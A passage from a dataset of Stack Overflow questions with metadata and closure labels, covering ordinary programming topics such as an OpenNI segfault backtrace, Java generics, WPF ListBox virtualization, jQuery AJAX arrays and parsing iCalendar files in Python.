NHAHandTrackerManager::UpdateTrackedHands(NADepthMapContainer const&, xn::ImageMetaData const&) () from /usr/lib/libXnVHandGenerator_1_5_2.so #11 0x00007fffe7571ea7 in NHAHandTrackerManager::Update(xn::DepthGenerator const&, xn::DepthMetaData const&, xn::ImageMetaData const&) () from /usr/lib/libXnVHandGenerator_1_5_2.so #12 0x00007fffe751d4a3 in XnVTracker::UpdateData() () from /usr/lib/libXnVHandGenerator_1_5_2.so #13 0x00007ffff7b96148 in xnUpdateDataImpl(XnInternalNodeData*) () from /usr/lib/libOpenNI.so #14 0x00007ffff7b98abd in xnUpdateTreeImpl(XnProductionNodesSet*, XnNodeInfo const*) () from /usr/lib/libOpenNI.so #15 0x00007ffff7b988f3 in xnUpdateTreeImpl(XnProductionNodesSet*, XnNodeInfo const*) () from /usr/lib/libOpenNI.so #16 0x00007ffff7b9b244 in xnUpdateAll(XnContext*) () from /usr/lib/libOpenNI.so #17 0x00007ffff7b9b798 in xnWaitOneUpdateAll () from /usr/lib/libOpenNI.so #18 0x0000000000403c49 in xn::Context::WaitOneUpdateAll (this=0x7fffffffe000, node=...) at ../OpenNI/Platform/Linux/Redist/OpenNI-Bin-Dev-Linux-x64-v1.5.2.23/Include/XnCppWrapper.h:5965 #19 0x0000000000402dab in main () at NiSimpleRead.cpp:240 [1]: http://pastebin.com/ZdG6Wcgb
c++
opencv
segmentation-fault
sigsegv
openni
04/30/2012 16:08:03
not a real question
Segmentation faults === I am writing this bit of code for fingertip detection using openNi and OpenCV and I keep getting Segmentation Faults when I run the code. I have been looking at it for days and I don't know what I can do to correct the fault. Any help would be much appreciated. The code is on [pastebin][1] and the error I get in gdb is below. Program received signal SIGSEGV, Segmentation fault. *__GI___libc_free (mem=0xff0000ff0000ff00) at malloc.c:3710 3710 malloc.c: No such file or directory. in malloc.c Current language: auto The current source language is "auto; currently c". (gdb) bt #0 *__GI___libc_free (mem=0xff0000ff0000ff00) at malloc.c:3710 #1 0x000000000040416b in cv::Mat::release (this=0x7fffffffb5f0) at /usr/local/include/opencv2/core/mat.hpp:382 #2 0x0000000000404058 in ~Mat (this=0x7fffffffb5f0, __in_chrg=<value optimized out>) at /usr/local/include/opencv2/core/mat.hpp:295 #3 0x0000000000405efd in Hands::findFingers (pPosition=0x7fffffffbfb0, depth=...) at Hands.cpp:358 #4 0x00000000004045c9 in Hands::Hand_Update (generator=..., nId=5, pPosition=0x7fffffffbfb0, fTime=27.3294144, pCookie=0x7fffffffdfc0) at Hands.cpp:60 #5 0x0000000000406cfe in xn::HandsGenerator::HandUpdateCB (hNode=0x10c94c0, user=5, pPosition=0x7fffffffbfb0, fTime=27.3294144, pCookie=0xe81d90) at ../OpenNI/Platform/Linux/Redist/OpenNI-Bin-Dev-Linux-x64-v1.5.2.23/Include/XnCppWrapper.h:4044 #6 0x00007fffe7522468 in XnVTrackerExistingHandEvent::Raise(unsigned int, XnVector3D const*, float) () from /usr/lib/libXnVHandGenerator_1_5_2.so #7 0x00007fffe7520ab4 in XnVTracker::UpdatePoint(unsigned int, XnVector3D const&, float) () from /usr/lib/libXnVHandGenerator_1_5_2.so #8 0x00007fffe7521225 in XnVTracker::ProcessEvent(NAEvent const&) () from /usr/lib/libXnVHandGenerator_1_5_2.so #9 0x00007fffe756f817 in NHAHandTrackerManager::SendHandMovedEvent(NHAHandTracker const&, unsigned int, SensorTime) () ---Type <return> to continue, or q <return> to quit--- from /usr/lib/libXnVHandGenerator_1_5_2.so #10 0x00007fffe756feab in NHAHandTrackerManager::UpdateTrackedHands(NADepthMapContainer const&, xn::ImageMetaData const&) () from /usr/lib/libXnVHandGenerator_1_5_2.so #11 0x00007fffe7571ea7 in NHAHandTrackerManager::Update(xn::DepthGenerator const&, xn::DepthMetaData const&, xn::ImageMetaData const&) () from /usr/lib/libXnVHandGenerator_1_5_2.so #12 0x00007fffe751d4a3 in XnVTracker::UpdateData() () from /usr/lib/libXnVHandGenerator_1_5_2.so #13 0x00007ffff7b96148 in xnUpdateDataImpl(XnInternalNodeData*) () from /usr/lib/libOpenNI.so #14 0x00007ffff7b98abd in xnUpdateTreeImpl(XnProductionNodesSet*, XnNodeInfo const*) () from /usr/lib/libOpenNI.so #15 0x00007ffff7b988f3 in xnUpdateTreeImpl(XnProductionNodesSet*, XnNodeInfo const*) () from /usr/lib/libOpenNI.so #16 0x00007ffff7b9b244 in xnUpdateAll(XnContext*) () from /usr/lib/libOpenNI.so #17 0x00007ffff7b9b798 in xnWaitOneUpdateAll () from /usr/lib/libOpenNI.so #18 0x0000000000403c49 in xn::Context::WaitOneUpdateAll (this=0x7fffffffe000, node=...) at ../OpenNI/Platform/Linux/Redist/OpenNI-Bin-Dev-Linux-x64-v1.5.2.23/Include/XnCppWrapper.h:5965 #19 0x0000000000402dab in main () at NiSimpleRead.cpp:240 [1]: http://pastebin.com/ZdG6Wcgb
1
6,323,248
06/12/2011 17:00:02
342,518
05/16/2010 18:42:16
1,627
82
Struggling to come up with API with interfaces and generic sets
I'm struggling to come up with an easy API [due to generics not being covariant][1] This is my new problem: I can't get a Set<> that does what I need. I've tried reading various guides but they all use lots of buzzwords that I get lost. Consider the following classes public class Parent {} public class Child extends Parent {} interface Store { public Set<Parent> getParents(); //PROBLEM!! This needs to change } At a minimum, I need these operations to work Set<Parent> parents = store.getParents(); parents.add(new Parent()); parents.add(new Child()); store.getParents().add(new Child()); //Note the lack of generics for(Parent curEntry : store.getParents()) { } Classes that implement Store need to be able to work with Child (meaning they have a Set that is child). They need to expose the Childs as Parents though to the outside world. --- Attempt #1 interface Store { public Set<Parent> getParents(); //PROBLEM!! This needs to change } class ConcreteStore implements Store { Set<Child> childs; public Set<Parent> getParents() { return (Set<? extends Parent>)childs; //ERROR: inconvertible types } } Attempt #2 interface Store { public Set<? extends Parent> getParents(); } class ConcreteStore implements Store { Set<Child> childs; public Set<Child> getParents() { return childs; } } Store store = new ConcreteStore(); Set<? extends Parent> parents = store.getParents(); parents.add(new Child()); //ERROR: cannot find symbol parents.add(new Parent()); //ERROR: cannot find symbol. What?! for (Parent curEntry : store.getParents()) { } That version, while I really like it, means that adding and removing from the Set outside of the Concrete class isn't possible. Which makes it useless. What really puzzles me is that not even adding a Parent will work. Attempt #3 interface Store<T extends Parent> { public Set<T> getParents(); } public static class ConcreteStore implements Store<Child> { Set<Child> childs; @Override public Set<Child> getParents() { return childs; } } Store store = new ConcreteStore(); Set<Parent> parents = store.getParents(); parents.add(new Parent()); parents.add(new Child()); for (Parent curEntry : store.getParents()) { //ERROR: incompatible types. Found object, requited Parent } Note that here I know I can do `Store<Child> store = new DatabaseStore()`, but due to a layer of abstraction that isn't possible and would get lost. Besides, passing around generics everywhere that you use a Parent looks ugly. -- I'm out of ideas on what to do. Doing this is way more complex than i thought. I really need some way to get [1]: http://stackoverflow.com/questions/6319163/cant-cast-generic-sets/6319313#6319313
java
generics
null
null
null
null
open
Struggling to come up with API with interfaces and generic sets === I'm struggling to come up with an easy API [due to generics not being covariant][1] This is my new problem: I can't get a Set<> that does what I need. I've tried reading various guides but they all use lots of buzzwords that I get lost. Consider the following classes public class Parent {} public class Child extends Parent {} interface Store { public Set<Parent> getParents(); //PROBLEM!! This needs to change } At a minimum, I need these operations to work Set<Parent> parents = store.getParents(); parents.add(new Parent()); parents.add(new Child()); store.getParents().add(new Child()); //Note the lack of generics for(Parent curEntry : store.getParents()) { } Classes that implement Store need to be able to work with Child (meaning they have a Set that is child). They need to expose the Childs as Parents though to the outside world. --- Attempt #1 interface Store { public Set<Parent> getParents(); //PROBLEM!! This needs to change } class ConcreteStore implements Store { Set<Child> childs; public Set<Parent> getParents() { return (Set<? extends Parent>)childs; //ERROR: inconvertible types } } Attempt #2 interface Store { public Set<? extends Parent> getParents(); } class ConcreteStore implements Store { Set<Child> childs; public Set<Child> getParents() { return childs; } } Store store = new ConcreteStore(); Set<? extends Parent> parents = store.getParents(); parents.add(new Child()); //ERROR: cannot find symbol parents.add(new Parent()); //ERROR: cannot find symbol. What?! for (Parent curEntry : store.getParents()) { } That version, while I really like it, means that adding and removing from the Set outside of the Concrete class isn't possible. Which makes it useless. What really puzzles me is that not even adding a Parent will work. Attempt #3 interface Store<T extends Parent> { public Set<T> getParents(); } public static class ConcreteStore implements Store<Child> { Set<Child> childs; @Override public Set<Child> getParents() { return childs; } } Store store = new ConcreteStore(); Set<Parent> parents = store.getParents(); parents.add(new Parent()); parents.add(new Child()); for (Parent curEntry : store.getParents()) { //ERROR: incompatible types. Found object, requited Parent } Note that here I know I can do `Store<Child> store = new DatabaseStore()`, but due to a layer of abstraction that isn't possible and would get lost. Besides, passing around generics everywhere that you use a Parent looks ugly. -- I'm out of ideas on what to do. Doing this is way more complex than i thought. I really need some way to get [1]: http://stackoverflow.com/questions/6319163/cant-cast-generic-sets/6319313#6319313
0
5,847,154
05/01/2011 07:35:31
321,114
04/20/2010 08:48:42
113
8
if i changed orcale tnsnames.ora , shall I restart the DB or listeners or just leave it ?
if i changed orcale tnsnames.ora , shall I restart the DB or listeners or just leave it ?
oracle
null
null
null
null
null
open
if i changed orcale tnsnames.ora , shall I restart the DB or listeners or just leave it ? === if i changed orcale tnsnames.ora , shall I restart the DB or listeners or just leave it ?
0
820,074
05/04/2009 13:23:43
97,313
04/28/2009 19:34:36
1
0
Which IDE does Google use for C++ and Java development
I am curious which IDE does Google use for C++ and Java development?
c++
java
google
null
null
06/13/2011 14:15:35
off topic
Which IDE does Google use for C++ and Java development === I am curious which IDE does Google use for C++ and Java development?
2
6,074,096
05/20/2011 15:24:40
50,335
12/30/2008 22:59:19
1,023
4
How to build an iPhone static library based on a Makefile?
I have managed to build a static C library on OSX using `make` on the command line. I have tried to use the same Makefile (with `ARCHFLAGS=-arch armv6 -arch armv7`) to build a static library for iOS, but it fails with: gcc-4.2: error trying to exec '/usr/bin/arm-apple-darwin10-gcc-4.2.1': execvp: No such file or directory I guess it is not working because I'm using the OSX SDK make instead of a some part of the iOS SDK. Any clues? N.B. For more details on the library in question (levmar) and for the Makefile, please refer to [this Stack Overflow answer][1]. [1]: http://stackoverflow.com/questions/2539735/trying-to-build-the-levmar-math-library-on-a-mac-using-the-accelerate-framework/6063585#6063585
c
ios
build
make
null
null
open
How to build an iPhone static library based on a Makefile? === I have managed to build a static C library on OSX using `make` on the command line. I have tried to use the same Makefile (with `ARCHFLAGS=-arch armv6 -arch armv7`) to build a static library for iOS, but it fails with: gcc-4.2: error trying to exec '/usr/bin/arm-apple-darwin10-gcc-4.2.1': execvp: No such file or directory I guess it is not working because I'm using the OSX SDK make instead of a some part of the iOS SDK. Any clues? N.B. For more details on the library in question (levmar) and for the Makefile, please refer to [this Stack Overflow answer][1]. [1]: http://stackoverflow.com/questions/2539735/trying-to-build-the-levmar-math-library-on-a-mac-using-the-accelerate-framework/6063585#6063585
0
2,597,185
04/08/2010 02:24:25
264,979
02/03/2010 05:13:15
28
4
binary search tree recursive subtree in java
Can anyone point me to a code example (java preferably) or psuedocode that uses recursion to return a subtree that contains all nodes with keys between fromKey and toKey. So if I was to call Tree.subtree(5,10) it should return all nodes in the BST that have keys between 5 and 10 inclusive - but I can't use loops or helper methods...only recursive calls to the subtree method, which takes fromKey and toKey as parameters. Thanks!
binary-tree
java
null
null
null
null
open
binary search tree recursive subtree in java === Can anyone point me to a code example (java preferably) or psuedocode that uses recursion to return a subtree that contains all nodes with keys between fromKey and toKey. So if I was to call Tree.subtree(5,10) it should return all nodes in the BST that have keys between 5 and 10 inclusive - but I can't use loops or helper methods...only recursive calls to the subtree method, which takes fromKey and toKey as parameters. Thanks!
0
7,146,526
08/22/2011 11:04:09
449,344
09/16/2010 10:08:29
455
10
parsing xml file and displaying the content using jquerymobile
I am new to Jquery mobile environment. I have XML file and I need to parse it and display the content using JqueryMobile, this is the format of xml <Result> <Details> <Attendee> <AttendeeID>1</AttendeeID> <Name>krishna</Name> <AttendeeEmail>kri@gmail.com</AttendeeEmail> <AttendeeMobile>9876543210</AttendeeMobile> <AttendeeProfession>Android</AttendeeProfession> <AttendeeTagCloud>Developers</AttendeeTagCloud> </Attendee> <Response>Success</Response> <Count>1</Count> </Details> </Result> I was google but could not find much or article which would help me out. Kindly help me to solve this.
jquery
jquery-mobile
null
null
null
null
open
parsing xml file and displaying the content using jquerymobile === I am new to Jquery mobile environment. I have XML file and I need to parse it and display the content using JqueryMobile, this is the format of xml <Result> <Details> <Attendee> <AttendeeID>1</AttendeeID> <Name>krishna</Name> <AttendeeEmail>kri@gmail.com</AttendeeEmail> <AttendeeMobile>9876543210</AttendeeMobile> <AttendeeProfession>Android</AttendeeProfession> <AttendeeTagCloud>Developers</AttendeeTagCloud> </Attendee> <Response>Success</Response> <Count>1</Count> </Details> </Result> I was google but could not find much or article which would help me out. Kindly help me to solve this.
0
4,904,637
02/05/2011 01:56:24
604,021
02/05/2011 01:44:40
1
0
How do I create a new url within a site using php?
I have a question. Sorry if my English isn't very good. But I will try and explain this as best as I can. How can I make a website where you can make your own page on the site and it stores through mysql?Thank you. I hope you can help.
php
mysql
null
null
null
02/05/2011 03:06:27
not a real question
How do I create a new url within a site using php? === I have a question. Sorry if my English isn't very good. But I will try and explain this as best as I can. How can I make a website where you can make your own page on the site and it stores through mysql?Thank you. I hope you can help.
1
9,250,572
02/12/2012 16:47:39
1,205,305
02/12/2012 16:26:13
1
0
Old Windows files salvaged from past hard drive: delete safely?
We (father and I) had to get a new system a few months ago, and were able to salvage the data from the old one's hard drive, including system and data files. The old drive has largely been cleaned, and now on our current drive we have "Old AppData," "Old Program Files" and "Old ProgramData" folders, relevant to the Windows Vista apps on the old system, but not relevant to Windows 7 or the now-reinstalled apps in it. Can these folders now be deleted without causing other problems, or should I just store them to removeable media?
windows-7
windows-vista
conflict
hard-drive
null
03/03/2012 03:38:40
off topic
Old Windows files salvaged from past hard drive: delete safely? === We (father and I) had to get a new system a few months ago, and were able to salvage the data from the old one's hard drive, including system and data files. The old drive has largely been cleaned, and now on our current drive we have "Old AppData," "Old Program Files" and "Old ProgramData" folders, relevant to the Windows Vista apps on the old system, but not relevant to Windows 7 or the now-reinstalled apps in it. Can these folders now be deleted without causing other problems, or should I just store them to removeable media?
2
8,247,015
11/23/2011 18:07:52
1,062,489
11/23/2011 17:57:00
1
0
Android Java, bitmap from resources
I have my images in my res/drawable folder, there's no problem about that. The thing is, i'd like to be able to do something like this: **Bitmap mBitmap = BitmapFactory.decodeResource(getResources(), R.drawable.*img[contar]*);** In other words eclipse doesn't let me do this *img[contar]* it only accepts the specific name of the image file (example: crystalblue), and i'd like to lets say move from "crystalblue" to "crystalred" image and in my case i need a variable to do it. Obs: I did declare img as string array. Any solutions anyone?
android
null
null
null
null
null
open
Android Java, bitmap from resources === I have my images in my res/drawable folder, there's no problem about that. The thing is, i'd like to be able to do something like this: **Bitmap mBitmap = BitmapFactory.decodeResource(getResources(), R.drawable.*img[contar]*);** In other words eclipse doesn't let me do this *img[contar]* it only accepts the specific name of the image file (example: crystalblue), and i'd like to lets say move from "crystalblue" to "crystalred" image and in my case i need a variable to do it. Obs: I did declare img as string array. Any solutions anyone?
0
4,278,205
11/25/2010 14:38:55
1,068
08/12/2008 08:44:09
1,966
51
Query about Excel formula - Function IF(…)
I want to use the function IF() from Excel in a formula for some Cell, as shown below - =IF(I2="SELL","(C2-F2)*D2","0") Which means I want to see if Cell I2 has text- SELL in it (IF condition true), then I want the cell to have formula as (C2-F2)*D2, else if condition is false, it prints 0. But trouble is that when condition is true, instead of putting the formula for the text it is putting the string (C2-F2)*D2 as it is in that Cell. What I want is that when condition is true, it should interpret (C2-F2)*D3 as formula in that cell. I tried many things , like - =IF(I2="SELL","=((C2-F2)*D2)","0") or =IF(I2="SELL","=("(C2-F2)*D2)"","0") but without any success. How can I get it working? thank you, -AD
excel-formula
null
null
null
null
null
open
Query about Excel formula - Function IF(…) === I want to use the function IF() from Excel in a formula for some Cell, as shown below - =IF(I2="SELL","(C2-F2)*D2","0") Which means I want to see if Cell I2 has text- SELL in it (IF condition true), then I want the cell to have formula as (C2-F2)*D2, else if condition is false, it prints 0. But trouble is that when condition is true, instead of putting the formula for the text it is putting the string (C2-F2)*D2 as it is in that Cell. What I want is that when condition is true, it should interpret (C2-F2)*D3 as formula in that cell. I tried many things , like - =IF(I2="SELL","=((C2-F2)*D2)","0") or =IF(I2="SELL","=("(C2-F2)*D2)"","0") but without any success. How can I get it working? thank you, -AD
0
8,740,324
01/05/2012 09:42:02
518,097
11/23/2010 22:23:37
275
25
How to design and maintain a Web Service
I've implemented a web service in the other day and successfully deployed it to app harbor. Behind the enterprise features I have some information being stored for statistic purposes, some cache to speed up similar requests, and a simple Exception handling system. What I didn't find in the web was how we should design this features, for instance what kind of generic information should you store for statistic. How do you store that information? In a relational database? How often should the cache be cleared? What I wish to know is, how to implement/design the web service non enterprise part, such as statistics, cache, etc.
web-services
design-patterns
statistics
null
null
01/06/2012 14:42:15
not a real question
How to design and maintain a Web Service === I've implemented a web service in the other day and successfully deployed it to app harbor. Behind the enterprise features I have some information being stored for statistic purposes, some cache to speed up similar requests, and a simple Exception handling system. What I didn't find in the web was how we should design this features, for instance what kind of generic information should you store for statistic. How do you store that information? In a relational database? How often should the cache be cleared? What I wish to know is, how to implement/design the web service non enterprise part, such as statistics, cache, etc.
1
9,945,640
03/30/2012 15:08:45
1,159,140
01/19/2012 18:01:55
322
21
Multidimensional Arrays via ajax to PHP
Ok seriously struggling here. I am having some problems trying to send a multdimensional array to PHP via ajax. Here's what I have been trying: To simplify rather than copy paste a wall of code: peoplearray[0] = [name] => 'john' [age] => '28' [sex] => 'Male' peoplearray[1] = [name] => 'julie' [age] => '20' [sex] => 'Female' main_array['item'] = 'x'; main_array['something'] = 'x'; main_array['another'] = 'x'; I want to get this to php via `post`. I figured I may aswell just join them together as I am multidimensional anyway thus : main_array['peoplearray'] = peoplearray; now to do the ajax: // var data = JSON.stringify(main_array); var send = $.ajax({ type: "POST", cache: false, url: "theurl", data: {data:main_array} //I do change this `main_array` when using the above stringify! }); send.done(function(msg) { console.log(msg); }) in PHP I am just doing the following right now: $data= $_POST['data']; print_r($data); in firebug: `(an empty string)` when I have the `var data = JSON.stringify(main_array);` uncommented I get the following: `[][` if i add `$data = json_decode($_POST['data']);` to the php I get: Array ( ) Basically the `main_array` I realise does not need to be an array and so I can get that stuff across no problem but what I need to do is get the `peoplearray` over so that I can do some `foreach` etc... with it in php. Any help would be much appreciated I am sure I am just being stupid!
php
javascript
jquery
arrays
jquery-ajax
null
open
Multidimensional Arrays via ajax to PHP === Ok seriously struggling here. I am having some problems trying to send a multdimensional array to PHP via ajax. Here's what I have been trying: To simplify rather than copy paste a wall of code: peoplearray[0] = [name] => 'john' [age] => '28' [sex] => 'Male' peoplearray[1] = [name] => 'julie' [age] => '20' [sex] => 'Female' main_array['item'] = 'x'; main_array['something'] = 'x'; main_array['another'] = 'x'; I want to get this to php via `post`. I figured I may aswell just join them together as I am multidimensional anyway thus : main_array['peoplearray'] = peoplearray; now to do the ajax: // var data = JSON.stringify(main_array); var send = $.ajax({ type: "POST", cache: false, url: "theurl", data: {data:main_array} //I do change this `main_array` when using the above stringify! }); send.done(function(msg) { console.log(msg); }) in PHP I am just doing the following right now: $data= $_POST['data']; print_r($data); in firebug: `(an empty string)` when I have the `var data = JSON.stringify(main_array);` uncommented I get the following: `[][` if i add `$data = json_decode($_POST['data']);` to the php I get: Array ( ) Basically the `main_array` I realise does not need to be an array and so I can get that stuff across no problem but what I need to do is get the `peoplearray` over so that I can do some `foreach` etc... with it in php. Any help would be much appreciated I am sure I am just being stupid!
0
3,289,258
07/20/2010 11:02:30
396,703
07/20/2010 11:02:30
1
0
What is the best way to learn about siteCore ?
i am from .net backgroud.i have to learn about siteCore.i got some manual from them.But to understand more easly is there any thing else.which explain shor and clear ?
sitecore6
null
null
null
null
04/20/2012 00:58:57
not constructive
What is the best way to learn about siteCore ? === i am from .net backgroud.i have to learn about siteCore.i got some manual from them.But to understand more easly is there any thing else.which explain shor and clear ?
4
3,215,115
07/09/2010 17:31:36
355,896
06/01/2010 21:53:51
6
0
NSTask Until Interrupted Command in Cocoa / Objective-C
I am trying to use NSTask on to run an ASR Multicast Stream, a Ruby Server Script, etc. Basically, I'm trying to run tasks with NSTask that do not finish running until interrupted, but the problem is that I can't get the NSTask to run in the background. So it ends up just running and holding up the rest of my program. Any help? Thanks!
ruby-on-rails
objective-c
cocoa
nstask
asr
null
open
NSTask Until Interrupted Command in Cocoa / Objective-C === I am trying to use NSTask on to run an ASR Multicast Stream, a Ruby Server Script, etc. Basically, I'm trying to run tasks with NSTask that do not finish running until interrupted, but the problem is that I can't get the NSTask to run in the background. So it ends up just running and holding up the rest of my program. Any help? Thanks!
0
8,016,413
11/04/2011 22:25:57
185,907
10/07/2009 19:58:53
179
8
WPF, ListBox, Templating, Virtualization
I have a ListBox with 1000 items and when a particular item is selected, the item expands (as I have Templated the ListBox Selected Item) providing more information to the user. The problem is that when ever I click on the ListBox, instead of expanding the item selected, the ListBox expands some other item. I was able to solve this problem by setting the `ScrollViewer.CanContentScroll="False"`, but it remove the virtualization making the control very to slow to operate. Correct me if I am wrong here, Templating the ListBoxItem which effectively changing the height of the item will also removes the virtualization. Here is the xaml for ListBox <ListBox x:Name="AllPortfoliosList" Grid.Column="0" Grid.Row="0" ClipToBounds="False" Style="{StaticResource LooklessListBox}" ItemsSource="{Binding AllPortfolioInfos}" ScrollViewer.CanContentScroll="False" ItemContainerStyle="{StaticResource RosterListItem}" /> RosterListItem: <Style x:Key="RosterListItem" TargetType="{x:Type ListBoxItem}"> <Setter Property="Background" Value="Transparent" /> <Setter Property="Template" Value="{DynamicResource item_rosterDetails}" /> <Setter Property="HorizontalContentAlignment" Value="Left" /> <Setter Property="VerticalContentAlignment" Value="Center" /> <Setter Property="Cursor" Value="Hand" /> <Setter Property="Padding" Value="0,0,0,0" /> <Setter Property="ClipToBounds" Value="False" /> <Style.Triggers> <Trigger Property="Selector.IsSelected" Value="True"> <Setter Property="Template" Value="{DynamicResource Item_watchDetails}" /> </Trigger> </Style.Triggers> </Style> Item_watchDetails: <ControlTemplate x:Key="Item_watchDetails"> <Grid x:Name="grid_watch_details" HorizontalAlignment="Stretch" VerticalAlignment="Top" SnapsToDevicePixels="True"> <Grid.ColumnDefinitions> <ColumnDefinition Width="auto" /> <ColumnDefinition /> <ColumnDefinition Width="auto" /> <ColumnDefinition /> </Grid.ColumnDefinitions> <Grid.RowDefinitions> <RowDefinition /> <RowDefinition /> <RowDefinition /> <RowDefinition /> <RowDefinition /> </Grid.RowDefinitions> ... </ControlTemplate> How do I solve this problem where the ListBox still maintains virtualization and enabling item templating with scrolling
wpf
listbox
virtualization
controltemplate
null
null
open
WPF, ListBox, Templating, Virtualization === I have a ListBox with 1000 items and when a particular item is selected, the item expands (as I have Templated the ListBox Selected Item) providing more information to the user. The problem is that when ever I click on the ListBox, instead of expanding the item selected, the ListBox expands some other item. I was able to solve this problem by setting the `ScrollViewer.CanContentScroll="False"`, but it remove the virtualization making the control very to slow to operate. Correct me if I am wrong here, Templating the ListBoxItem which effectively changing the height of the item will also removes the virtualization. Here is the xaml for ListBox <ListBox x:Name="AllPortfoliosList" Grid.Column="0" Grid.Row="0" ClipToBounds="False" Style="{StaticResource LooklessListBox}" ItemsSource="{Binding AllPortfolioInfos}" ScrollViewer.CanContentScroll="False" ItemContainerStyle="{StaticResource RosterListItem}" /> RosterListItem: <Style x:Key="RosterListItem" TargetType="{x:Type ListBoxItem}"> <Setter Property="Background" Value="Transparent" /> <Setter Property="Template" Value="{DynamicResource item_rosterDetails}" /> <Setter Property="HorizontalContentAlignment" Value="Left" /> <Setter Property="VerticalContentAlignment" Value="Center" /> <Setter Property="Cursor" Value="Hand" /> <Setter Property="Padding" Value="0,0,0,0" /> <Setter Property="ClipToBounds" Value="False" /> <Style.Triggers> <Trigger Property="Selector.IsSelected" Value="True"> <Setter Property="Template" Value="{DynamicResource Item_watchDetails}" /> </Trigger> </Style.Triggers> </Style> Item_watchDetails: <ControlTemplate x:Key="Item_watchDetails"> <Grid x:Name="grid_watch_details" HorizontalAlignment="Stretch" VerticalAlignment="Top" SnapsToDevicePixels="True"> <Grid.ColumnDefinitions> <ColumnDefinition Width="auto" /> <ColumnDefinition /> <ColumnDefinition Width="auto" /> <ColumnDefinition /> </Grid.ColumnDefinitions> <Grid.RowDefinitions> <RowDefinition /> <RowDefinition /> <RowDefinition /> <RowDefinition /> <RowDefinition /> </Grid.RowDefinitions> ... </ControlTemplate> How do I solve this problem where the ListBox still maintains virtualization and enabling item templating with scrolling
0
3,408,097
08/04/2010 17:28:13
411,084
08/04/2010 17:28:13
1
0
Parsing files (ics/ icalendar) using Python
I have a .ics file in the following format. What is the best way to parse it. I need to retrieve the Summary, Description, and Time for each of the entries. Thanks in advance for your help. BEGIN:VCALENDAR X-LOTUS-CHARSET:UTF-8 VERSION:2.0 PRODID:-//Lotus Development Corporation//NONSGML Notes 8.0//EN METHOD:PUBLISH BEGIN:VTIMEZONE TZID:India BEGIN:STANDARD DTSTART:19500101T020000 TZOFFSETFROM:+0530 TZOFFSETTO:+0530 END:STANDARD END:VTIMEZONE BEGIN:VEVENT DTSTART;TZID="India":20100615T111500 DTEND;TZID="India":20100615T121500 TRANSP:OPAQUE DTSTAMP:20100713T071035Z CLASS:PUBLIC DESCRIPTION:Emails\nDarlene\n Murphy\nDr. Ferri\n UID:12D3901F0AD9E83E65257743001F2C9A-Lotus_Notes_Generated X-LOTUS-UPDATE-SEQ:1 X-LOTUS-UPDATE-WISL:$S:1;$L:1;$B:1;$R:1;$E:1;$W:1;$O:1;$M:1 X-LOTUS-NOTESVERSION:2 X-LOTUS-APPTTYPE:0 X-LOTUS-CHILD_UID:12D3901F0AD9E83E65257743001F2C9A END:VEVENT BEGIN:VEVENT DTSTART;TZID="India":20100628T130000 DTEND;TZID="India":20100628T133000 TRANSP:OPAQUE DTSTAMP:20100628T055408Z CLASS:PUBLIC DESCRIPTION: SUMMARY:smart energy management LOCATION:8778/92050462 UID:07F96A3F1C9547366525775000203D96-Lotus_Notes_Generated X-LOTUS-UPDATE-SEQ:1 X-LOTUS-UPDATE-WISL:$S:1;$L:1;$B:1;$R:1;$E:1;$W:1;$O:1;$M:1 X-LOTUS-NOTESVERSION:2 X-LOTUS-NOTICETYPE:A X-LOTUS-APPTTYPE:3 X-LOTUS-CHILD_UID:07F96A3F1C9547366525775000203D96 END:VEVENT BEGIN:VEVENT DTSTART;TZID="India":20100629T110000 DTEND;TZID="India":20100629T120000 TRANSP:OPAQUE DTSTAMP:20100713T071037Z CLASS:PUBLIC SUMMARY:meeting UID:6011DDDD659E49D765257751001D2B4B-Lotus_Notes_Generated X-LOTUS-UPDATE-SEQ:1 X-LOTUS-UPDATE-WISL:$S:1;$L:1;$B:1;$R:1;$E:1;$W:1;$O:1;$M:1 X-LOTUS-NOTESVERSION:2 X-LOTUS-APPTTYPE:0 X-LOTUS-CHILD_UID:6011DDDD659E49D765257751001D2B4B END:VEVENT
python
null
null
null
null
null
open
Parsing files (ics/ icalendar) using Python === I have a .ics file in the following format. What is the best way to parse it. I need to retrieve the Summary, Description, and Time for each of the entries. Thanks in advance for your help. BEGIN:VCALENDAR X-LOTUS-CHARSET:UTF-8 VERSION:2.0 PRODID:-//Lotus Development Corporation//NONSGML Notes 8.0//EN METHOD:PUBLISH BEGIN:VTIMEZONE TZID:India BEGIN:STANDARD DTSTART:19500101T020000 TZOFFSETFROM:+0530 TZOFFSETTO:+0530 END:STANDARD END:VTIMEZONE BEGIN:VEVENT DTSTART;TZID="India":20100615T111500 DTEND;TZID="India":20100615T121500 TRANSP:OPAQUE DTSTAMP:20100713T071035Z CLASS:PUBLIC DESCRIPTION:Emails\nDarlene\n Murphy\nDr. Ferri\n UID:12D3901F0AD9E83E65257743001F2C9A-Lotus_Notes_Generated X-LOTUS-UPDATE-SEQ:1 X-LOTUS-UPDATE-WISL:$S:1;$L:1;$B:1;$R:1;$E:1;$W:1;$O:1;$M:1 X-LOTUS-NOTESVERSION:2 X-LOTUS-APPTTYPE:0 X-LOTUS-CHILD_UID:12D3901F0AD9E83E65257743001F2C9A END:VEVENT BEGIN:VEVENT DTSTART;TZID="India":20100628T130000 DTEND;TZID="India":20100628T133000 TRANSP:OPAQUE DTSTAMP:20100628T055408Z CLASS:PUBLIC DESCRIPTION: SUMMARY:smart energy management LOCATION:8778/92050462 UID:07F96A3F1C9547366525775000203D96-Lotus_Notes_Generated X-LOTUS-UPDATE-SEQ:1 X-LOTUS-UPDATE-WISL:$S:1;$L:1;$B:1;$R:1;$E:1;$W:1;$O:1;$M:1 X-LOTUS-NOTESVERSION:2 X-LOTUS-NOTICETYPE:A X-LOTUS-APPTTYPE:3 X-LOTUS-CHILD_UID:07F96A3F1C9547366525775000203D96 END:VEVENT BEGIN:VEVENT DTSTART;TZID="India":20100629T110000 DTEND;TZID="India":20100629T120000 TRANSP:OPAQUE DTSTAMP:20100713T071037Z CLASS:PUBLIC SUMMARY:meeting UID:6011DDDD659E49D765257751001D2B4B-Lotus_Notes_Generated X-LOTUS-UPDATE-SEQ:1 X-LOTUS-UPDATE-WISL:$S:1;$L:1;$B:1;$R:1;$E:1;$W:1;$O:1;$M:1 X-LOTUS-NOTESVERSION:2 X-LOTUS-APPTTYPE:0 X-LOTUS-CHILD_UID:6011DDDD659E49D765257751001D2B4B END:VEVENT
0
11,548,571
07/18/2012 19:07:51
1,533,578
07/18/2012 04:15:15
1
0
How to make sure not same numbers are entered and order them for less to greater in a array?
I want to know how to store 9 values in an array and then make sure that they are not repeat as well as less to greater
c++
null
null
null
null
07/18/2012 20:54:50
